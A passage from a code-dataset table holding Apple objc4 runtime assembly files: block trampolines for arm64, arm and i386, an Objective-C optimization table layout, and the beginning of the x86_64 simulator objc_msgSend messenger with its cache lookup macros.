repo_id stringlengths 5 115 | size int64 590 5.01M | file_path stringlengths 4 212 | content stringlengths 590 5.01M |
|---|---|---|---|
opensource-apple/objc4 | 2,300 | runtime/a1a2-blocktramps-arm64.s | #if __arm64__
#include <mach/vm_param.h>
.text
.private_extern __a1a2_tramphead
.private_extern __a1a2_firsttramp
.private_extern __a1a2_trampend
.align PAGE_MAX_SHIFT
__a1a2_tramphead:
L_a1a2_tramphead:
/*
x0 == self
x17 == address of called trampoline's data (1 page before its code)
lr == original return address
*/
mov x1, x0 // _cmd = self
ldr x0, [x17] // self = block object
ldr x16, [x0, #16] // tail call block->invoke
br x16
// pad up to TrampolineBlockPagePair header size
nop
nop
.macro TrampolineEntry
// load address of trampoline data (one page before this instruction)
adr x17, -PAGE_MAX_SIZE
b L_a1a2_tramphead
.endmacro
.macro TrampolineEntryX16
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
.endmacro
.macro TrampolineEntryX256
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
.endmacro
.align 3
.private_extern __a1a2_firsttramp
__a1a2_firsttramp:
// 2048-3 trampolines to fill 16K page
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
// TrampolineEntry
// TrampolineEntry
// TrampolineEntry
.private_extern __a1a2_trampend
__a1a2_trampend:
#endif
|
opensource-apple/objc4 | 1,580 | runtime/objc-sel-table.s | #include <TargetConditionals.h>
#include <mach/vm_param.h>
#if __LP64__
# define PTR(x) .quad x
#else
# define PTR(x) .long x
#endif
.section __TEXT,__objc_opt_ro
.align 3
.private_extern __objc_opt_data
__objc_opt_data:
.long 13 /* table.version */
.long 0 /* table.selopt_offset */
.long 0 /* table.headeropt_offset */
.long 0 /* table.clsopt_offset */
.space PAGE_MAX_SIZE-16
/* space for selopt, smax/capacity=262144, blen/mask=262143+1 */
.space 262144 /* mask tab */
.space 524288 /* checkbytes */
.space 524288*4 /* offsets */
/* space for clsopt, smax/capacity=32768, blen/mask=16383+1 */
.space 16384 /* mask tab */
.space 32768 /* checkbytes */
.space 32768*12 /* offsets to name and class and header_info */
.space PAGE_MAX_SIZE /* some duplicate classes */
/* space for protocolopt, smax/capacity=8192, blen/mask=4095+1 */
.space 4096 /* mask tab */
.space 8192 /* checkbytes */
.space 8192*4 /* offsets */
.section __DATA,__objc_opt_rw
.align 3
.private_extern __objc_opt_rw_data
__objc_opt_rw_data:
/* space for header_info structures */
.space 32768
/* space for 8192 protocols */
#if __LP64__
.space 8192 * 11 * 8
#else
.space 8192 * 11 * 4
#endif
/* section of pointers that the shared cache optimizer wants to know about */
.section __DATA,__objc_opt_ptrs
.align 3
#if TARGET_OS_MAC && !TARGET_OS_IPHONE && __i386__
// old ABI
.globl .objc_class_name_Protocol
PTR(.objc_class_name_Protocol)
#else
// new ABI
.globl _OBJC_CLASS_$_Protocol
PTR(_OBJC_CLASS_$_Protocol)
#endif
|
opensource-apple/objc4 | 2,536 | runtime/a2a3-blocktramps-arm.s | #if __arm__
#include <arm/arch.h>
#include <mach/vm_param.h>
.syntax unified
.text
.private_extern __a2a3_tramphead
.private_extern __a2a3_firsttramp
.private_extern __a2a3_trampend
// Trampoline machinery assumes the trampolines are Thumb function pointers
#if !__thumb2__
# error sorry
#endif
.thumb
.thumb_func __a2a3_tramphead
.thumb_func __a2a3_firsttramp
.thumb_func __a2a3_trampend
.align PAGE_MAX_SHIFT
__a2a3_tramphead:
/*
r1 == self
r12 == pc of trampoline's first instruction + PC bias
lr == original return address
*/
mov r2, r1 // _cmd = self
// Trampoline's data is one page before the trampoline text.
// Also correct PC bias of 4 bytes.
sub r12, #PAGE_MAX_SIZE
ldr r1, [r12, #-4] // self = block object
ldr pc, [r1, #12] // tail call block->invoke
// not reached
// Align trampolines to 8 bytes
.align 3
.macro TrampolineEntry
mov r12, pc
b __a2a3_tramphead
.align 3
.endmacro
.macro TrampolineEntryX16
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
.endmacro
.macro TrampolineEntryX256
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
.endmacro
.private_extern __a2a3_firsttramp
__a2a3_firsttramp:
// 2048-2 trampolines to fill 16K page
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
// TrampolineEntry
// TrampolineEntry
.private_extern __a2a3_trampend
__a2a3_trampend:
#endif
|
opensource-apple/objc4 | 11,799 | runtime/a2a3-blocktramps-i386.s | /*
* Copyright (c) 1999-2007 Apple Inc. All Rights Reserved.
*
* @APPLE_LICENSE_HEADER_START@
*
* This file contains Original Code and/or Modifications of Original Code
* as defined in and that are subject to the Apple Public Source License
* Version 2.0 (the 'License'). You may not use this file except in
* compliance with the License. Please obtain a copy of the License at
* http://www.opensource.apple.com/apsl/ and read it before using this
* file.
*
* The Original Code and all software distributed under the License are
* distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
* EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
* INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
* Please see the License for the specific language governing rights and
* limitations under the License.
*
* @APPLE_LICENSE_HEADER_END@
*/
#ifdef __i386__
#include <mach/vm_param.h>
.text
.private_extern __a2a3_tramphead
.private_extern __a2a3_firsttramp
.private_extern __a2a3_nexttramp
.private_extern __a2a3_trampend
.align PAGE_SHIFT
__a2a3_tramphead:
popl %eax
andl $0xFFFFFFF8, %eax
subl $ PAGE_SIZE, %eax
movl 8(%esp), %ecx // self -> ecx
movl %ecx, 12(%esp) // ecx -> _cmd
movl (%eax), %ecx // blockPtr -> ecx
movl %ecx, 8(%esp) // ecx -> self
jmp *12(%ecx) // tail to block->invoke
.macro TrampolineEntry
call __a2a3_tramphead
nop
nop
nop
.endmacro
.align 5
__a2a3_firsttramp:
TrampolineEntry
__a2a3_nexttramp:
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
__a2a3_trampend:
#endif
|
opensource-apple/objc4 | 2,536 | runtime/a1a2-blocktramps-arm.s | #if __arm__
#include <arm/arch.h>
#include <mach/vm_param.h>
.syntax unified
.text
.private_extern __a1a2_tramphead
.private_extern __a1a2_firsttramp
.private_extern __a1a2_trampend
// Trampoline machinery assumes the trampolines are Thumb function pointers
#if !__thumb2__
# error sorry
#endif
.thumb
.thumb_func __a1a2_tramphead
.thumb_func __a1a2_firsttramp
.thumb_func __a1a2_trampend
.align PAGE_MAX_SHIFT
__a1a2_tramphead:
/*
r0 == self
r12 == pc of trampoline's first instruction + PC bias
lr == original return address
*/
mov r1, r0 // _cmd = self
// Trampoline's data is one page before the trampoline text.
// Also correct PC bias of 4 bytes.
sub r12, #PAGE_MAX_SIZE
ldr r0, [r12, #-4] // self = block object
ldr pc, [r0, #12] // tail call block->invoke
// not reached
// Align trampolines to 8 bytes
.align 3
.macro TrampolineEntry
mov r12, pc
b __a1a2_tramphead
.align 3
.endmacro
.macro TrampolineEntryX16
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
.endmacro
.macro TrampolineEntryX256
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
.endmacro
.private_extern __a1a2_firsttramp
__a1a2_firsttramp:
// 2048-2 trampolines to fill 16K page
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX256
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntryX16
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
TrampolineEntry
// TrampolineEntry
// TrampolineEntry
.private_extern __a1a2_trampend
__a1a2_trampend:
#endif
|
opensource-apple/objc4 | 25,750 | runtime/Messengers.subproj/objc-msg-simulator-x86_64.s | /*
* Copyright (c) 1999-2007 Apple Inc. All Rights Reserved.
*
* @APPLE_LICENSE_HEADER_START@
*
* This file contains Original Code and/or Modifications of Original Code
* as defined in and that are subject to the Apple Public Source License
* Version 2.0 (the 'License'). You may not use this file except in
* compliance with the License. Please obtain a copy of the License at
* http://www.opensource.apple.com/apsl/ and read it before using this
* file.
*
* The Original Code and all software distributed under the License are
* distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
* EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
* INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
* Please see the License for the specific language governing rights and
* limitations under the License.
*
* @APPLE_LICENSE_HEADER_END@
*/
#include <TargetConditionals.h>
#if __x86_64__ && TARGET_IPHONE_SIMULATOR
/********************************************************************
********************************************************************
**
** objc-msg-x86_64.s - x86-64 code to support objc messaging.
**
********************************************************************
********************************************************************/
.data
// _objc_entryPoints and _objc_exitPoints are used by objc
// to get the critical regions for which method caches
// cannot be garbage collected.
.align 4
.private_extern _objc_entryPoints
_objc_entryPoints:
.quad _cache_getImp
.quad _objc_msgSend
.quad _objc_msgSend_fpret
.quad _objc_msgSend_fp2ret
.quad _objc_msgSend_stret
.quad _objc_msgSendSuper
.quad _objc_msgSendSuper_stret
.quad _objc_msgSendSuper2
.quad _objc_msgSendSuper2_stret
.quad 0
.private_extern _objc_exitPoints
_objc_exitPoints:
.quad LExit_cache_getImp
.quad LExit_objc_msgSend
.quad LExit_objc_msgSend_fpret
.quad LExit_objc_msgSend_fp2ret
.quad LExit_objc_msgSend_stret
.quad LExit_objc_msgSendSuper
.quad LExit_objc_msgSendSuper_stret
.quad LExit_objc_msgSendSuper2
.quad LExit_objc_msgSendSuper2_stret
.quad 0
/********************************************************************
* List every exit insn from every messenger for debugger use.
* Format:
* (
* 1 word instruction's address
* 1 word type (ENTER or FAST_EXIT or SLOW_EXIT or NIL_EXIT)
* )
* 1 word zero
*
* ENTER is the start of a dispatcher
* FAST_EXIT is method dispatch
* SLOW_EXIT is uncached method lookup
* NIL_EXIT is returning zero from a message sent to nil
* These must match objc-gdb.h.
********************************************************************/
#define ENTER 1
#define FAST_EXIT 2
#define SLOW_EXIT 3
#define NIL_EXIT 4
.section __DATA,__objc_msg_break
.globl _gdb_objc_messenger_breakpoints
_gdb_objc_messenger_breakpoints:
// contents populated by the macros below
.macro MESSENGER_START
4:
.section __DATA,__objc_msg_break
.quad 4b
.quad ENTER
.text
.endmacro
.macro MESSENGER_END_FAST
4:
.section __DATA,__objc_msg_break
.quad 4b
.quad FAST_EXIT
.text
.endmacro
.macro MESSENGER_END_SLOW
4:
.section __DATA,__objc_msg_break
.quad 4b
.quad SLOW_EXIT
.text
.endmacro
.macro MESSENGER_END_NIL
4:
.section __DATA,__objc_msg_break
.quad 4b
.quad NIL_EXIT
.text
.endmacro
/********************************************************************
* Recommended multi-byte NOP instructions
* (Intel 64 and IA-32 Architectures Software Developer's Manual Volume 2B)
********************************************************************/
#define nop1 .byte 0x90
#define nop2 .byte 0x66,0x90
#define nop3 .byte 0x0F,0x1F,0x00
#define nop4 .byte 0x0F,0x1F,0x40,0x00
#define nop5 .byte 0x0F,0x1F,0x44,0x00,0x00
#define nop6 .byte 0x66,0x0F,0x1F,0x44,0x00,0x00
#define nop7 .byte 0x0F,0x1F,0x80,0x00,0x00,0x00,0x00
#define nop8 .byte 0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00
#define nop9 .byte 0x66,0x0F,0x1F,0x84,0x00,0x00,0x00,0x00,0x00
/********************************************************************
* Names for parameter registers.
********************************************************************/
#define a1 rdi
#define a1d edi
#define a1b dil
#define a2 rsi
#define a2d esi
#define a2b sil
#define a3 rdx
#define a3d edx
#define a4 rcx
#define a4d ecx
#define a5 r8
#define a5d r8d
#define a6 r9
#define a6d r9d
/********************************************************************
* Names for relative labels
* DO NOT USE THESE LABELS ELSEWHERE
* Reserved labels: 6: 7: 8: 9:
********************************************************************/
#define LCacheMiss 6
#define LCacheMiss_f 6f
#define LCacheMiss_b 6b
#define LGetIsaDone 7
#define LGetIsaDone_f 7f
#define LGetIsaDone_b 7b
#define LNilOrTagged 8
#define LNilOrTagged_f 8f
#define LNilOrTagged_b 8b
#define LNil 9
#define LNil_f 9f
#define LNil_b 9b
/********************************************************************
* Macro parameters
********************************************************************/
#define NORMAL 0
#define FPRET 1
#define FP2RET 2
#define GETIMP 3
#define STRET 4
#define SUPER 5
#define SUPER_STRET 6
#define SUPER2 7
#define SUPER2_STRET 8
/********************************************************************
*
* Structure definitions.
*
********************************************************************/
// objc_super parameter to sendSuper
#define receiver 0
#define class 8
// Selected field offsets in class structure
// #define isa 0 USE GetIsa INSTEAD
// Method descriptor
#define method_name 0
#define method_imp 16
//////////////////////////////////////////////////////////////////////
//
// ENTRY functionName
//
// Assembly directives to begin an exported function.
//
// Takes: functionName - name of the exported function
//////////////////////////////////////////////////////////////////////
.macro ENTRY
.text
.globl $0
.align 6, 0x90
$0:
.cfi_startproc
.endmacro
.macro STATIC_ENTRY
.text
.private_extern $0
.align 2, 0x90
$0:
.cfi_startproc
.endmacro
//////////////////////////////////////////////////////////////////////
//
// END_ENTRY functionName
//
// Assembly directives to end an exported function. Just a placeholder,
// a close-parenthesis for ENTRY, until it is needed for something.
//
// Takes: functionName - name of the exported function
//////////////////////////////////////////////////////////////////////
.macro END_ENTRY
.cfi_endproc
LExit$0:
.endmacro
/////////////////////////////////////////////////////////////////////
//
// SaveRegisters
//
// Pushes a stack frame and saves all registers that might contain
// parameter values.
//
// On entry:
// stack = ret
//
// On exit:
// %rsp is 16-byte aligned
//
/////////////////////////////////////////////////////////////////////
.macro SaveRegisters
push %rbp
.cfi_def_cfa_offset 16
.cfi_offset rbp, -16
mov %rsp, %rbp
.cfi_def_cfa_register rbp
sub $$0x80+8, %rsp // +8 for alignment
movdqa %xmm0, -0x80(%rbp)
push %rax // might be xmm parameter count
movdqa %xmm1, -0x70(%rbp)
push %a1
movdqa %xmm2, -0x60(%rbp)
push %a2
movdqa %xmm3, -0x50(%rbp)
push %a3
movdqa %xmm4, -0x40(%rbp)
push %a4
movdqa %xmm5, -0x30(%rbp)
push %a5
movdqa %xmm6, -0x20(%rbp)
push %a6
movdqa %xmm7, -0x10(%rbp)
.endmacro
/////////////////////////////////////////////////////////////////////
//
// RestoreRegisters
//
// Pops a stack frame pushed by SaveRegisters
//
// On entry:
// %rbp unchanged since SaveRegisters
//
// On exit:
// stack = ret
//
/////////////////////////////////////////////////////////////////////
.macro RestoreRegisters
movdqa -0x80(%rbp), %xmm0
pop %a6
movdqa -0x70(%rbp), %xmm1
pop %a5
movdqa -0x60(%rbp), %xmm2
pop %a4
movdqa -0x50(%rbp), %xmm3
pop %a3
movdqa -0x40(%rbp), %xmm4
pop %a2
movdqa -0x30(%rbp), %xmm5
pop %a1
movdqa -0x20(%rbp), %xmm6
pop %rax
movdqa -0x10(%rbp), %xmm7
leave
.cfi_def_cfa rsp, 8
.cfi_same_value rbp
.endmacro
/////////////////////////////////////////////////////////////////////
//
// CacheLookup return-type, caller
//
// Locate the implementation for a class in a selector's method cache.
//
// Takes:
// $0 = NORMAL, FPRET, FP2RET, STRET, SUPER, SUPER_STRET, SUPER2, SUPER2_STRET, GETIMP
// a2 or a3 (STRET) = selector a.k.a. cache
// r11 = class to search
//
// On exit: r10 clobbered
// (found) calls or returns IMP, eq/ne/r11 set for forwarding
// (not found) jumps to LCacheMiss, class still in r11
//
/////////////////////////////////////////////////////////////////////
.macro CacheHit
// CacheHit must always be preceded by a not-taken `jne` instruction
// in order to set the correct flags for _objc_msgForward_impcache.
// r10 = found bucket
.if $0 == GETIMP
movq 8(%r10), %rax // return imp
leaq __objc_msgSend_uncached_impcache(%rip), %r11
cmpq %rax, %r11
jne 4f
xorl %eax, %eax // don't return msgSend_uncached
4: ret
.elseif $0 == NORMAL || $0 == FPRET || $0 == FP2RET
// eq already set for forwarding by `jne`
MESSENGER_END_FAST
jmp *8(%r10) // call imp
.elseif $0 == SUPER
movq receiver(%a1), %a1 // load real receiver
cmp %r10, %r10 // set eq for non-stret forwarding
MESSENGER_END_FAST
jmp *8(%r10) // call imp
.elseif $0 == SUPER2
movq receiver(%a1), %a1 // load real receiver
cmp %r10, %r10 // set eq for non-stret forwarding
MESSENGER_END_FAST
jmp *8(%r10) // call imp
.elseif $0 == STRET
test %r10, %r10 // set ne for stret forwarding
MESSENGER_END_FAST
jmp *8(%r10) // call imp
.elseif $0 == SUPER_STRET
movq receiver(%a2), %a2 // load real receiver
test %r10, %r10 // set ne for stret forwarding
MESSENGER_END_FAST
jmp *8(%r10) // call imp
.elseif $0 == SUPER2_STRET
movq receiver(%a2), %a2 // load real receiver
test %r10, %r10 // set ne for stret forwarding
MESSENGER_END_FAST
jmp *8(%r10) // call imp
.else
.abort oops
.endif
.endmacro
.macro CacheLookup
.if $0 != STRET && $0 != SUPER_STRET && $0 != SUPER2_STRET
movq %a2, %r10 // r10 = _cmd
.else
movq %a3, %r10 // r10 = _cmd
.endif
andl 24(%r11), %r10d // r10 = _cmd & class->cache.mask
shlq $$4, %r10 // r10 = offset = (_cmd & mask)<<4
addq 16(%r11), %r10 // r10 = class->cache.buckets + offset
.if $0 != STRET && $0 != SUPER_STRET && $0 != SUPER2_STRET
cmpq (%r10), %a2 // if (bucket->sel != _cmd)
.else
cmpq (%r10), %a3 // if (bucket->sel != _cmd)
.endif
